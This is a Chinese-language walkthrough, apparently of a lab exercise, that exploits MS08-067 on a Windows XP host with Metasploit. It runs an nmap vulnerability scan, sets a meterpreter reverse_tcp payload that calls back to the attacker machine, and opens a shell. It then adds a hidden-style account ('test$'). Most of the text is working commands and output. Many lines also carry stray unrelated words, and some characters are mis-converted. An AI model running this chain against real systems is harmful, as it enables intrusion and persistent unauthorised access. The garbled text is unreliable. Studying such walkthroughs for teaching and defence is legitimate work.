手工進行漏洞檢查的最佳途徑之一是在metasploit中使用nmap的掃描腳本ios
root@bt:/opt/metasploit/msf3# msfconsoleshell
msf > nmap -sT -A --script=smb-check-vulns -PO 172.16.21.170windows
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-11-19 14:58 CST
Nmap scan report for 172.16.21.170
Host is up (0.00035s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft ESMTP 6.0.2600.1
80/tcp open http Microsoft IIS httpd 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1057/tcp open msrpc Microsoft Windows RPC
1058/tcp open msrpc Microsoft Windows RPC
5000/tcp open upnp Microsoft Windows UPnP
MAC Address: 00:0C:29:9F:1E:49 (VMware)
Device type: general purpose
Running: Microsoft Windows 2000|XP
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows 2000 SP0 - SP4 or Windows XP SP0 - SP1
Network Distance: 1 hop
Service Info: Host: lixiuli-vcs86vr; OS: Windows; CPE: cpe:/o:microsoft:windowsapi
Host script results:
| smb-check-vulns:
| MS08-067: LIKELY VULNERABLE (host stopped responding)
| Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: TIMEOUT
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)session
TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 172.16.21.170框架
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.88 secondstcp
發現|MS08-067: LIKELY VULNERABLE (host stopped responding)後,去metasploit中找可用於此漏洞的攻擊模塊ui
msf > search ms08_067 在metasploit框架中查找ms08_06 netapi攻擊模塊spa
Matching Modules
================操作系統
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi 用use命令加載這個模塊
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp 設置攻擊載荷爲基於windows系統的meterpreter/reverse_tcp,這個載荷在攻擊成功後,會從目錄主機發起一個反彈鏈接,鏈接到lhost中指定的ip地址,這種反彈鏈接能夠讓你繞過防火牆的入站流量保護或者穿透nat網關
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets 大多數msf滲透攻擊模塊會自動對目標系統類型進行識別,而不須要手工制定此參數,可是ms08-067漏洞的攻擊中,一般沒法正確的自動識別出系統類型
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)
4 Windows XP SP2 English (NX)
5 Windows XP SP3 English (AlwaysOn NX)
6 Windows XP SP3 English (NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO NX)
9 Windows 2003 SP1 English (NX)
10 Windows 2003 SP1 Japanese (NO NX)
11 Windows 2003 SP2 English (NO NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese - Simplified (NX)
18 Windows XP SP2 Chinese - Traditional (NX)
19 Windows XP SP2 Czech (NX)
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32 Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese - Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese - Simplified (NX)
42 Windows XP SP3 Chinese - Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese - Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)
msf exploit(ms08_067_netapi) > set target 2 指定操做系統類型
target => 2
msf exploit(ms08_067_netapi) > set rhost 172.16.21.170 指定目錄地址
rhost => 172.16.21.170
msf exploit(ms08_067_netapi) > set lhost 172.16.21.17 攻擊機的ip地址
lhost => 172.16.21.17
msf exploit(ms08_067_netapi) > set lport 8080 攻擊機監聽的tcp端口
lport => 8080
msf exploit(ms08_067_netapi) > show options 查看參數是否都已經正確設置
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.21.170 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 172.16.21.17 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
2 Windows XP SP0/SP1 Universal
msf exploit(ms08_067_netapi) > exploit 開始
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.21.17:8080
[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.21.17:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.21.170
[*] Meterpreter session 1 opened (172.16.21.17:8080 -> 172.16.21.170:1039) at 2013-11-19 15:23:40 +0800
exploit命令初始化攻擊環境,並對目標進行攻擊嘗試,此次攻擊時成功的。
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > shell
Process 732 created.
Channel 1 created.
Microsoft Windows XP [ 5.1.2600]
(C) 1985-2001 Microsoft Corp.
C:\windows>net user test$ 123456 /add
去被攻擊機器170上看一下: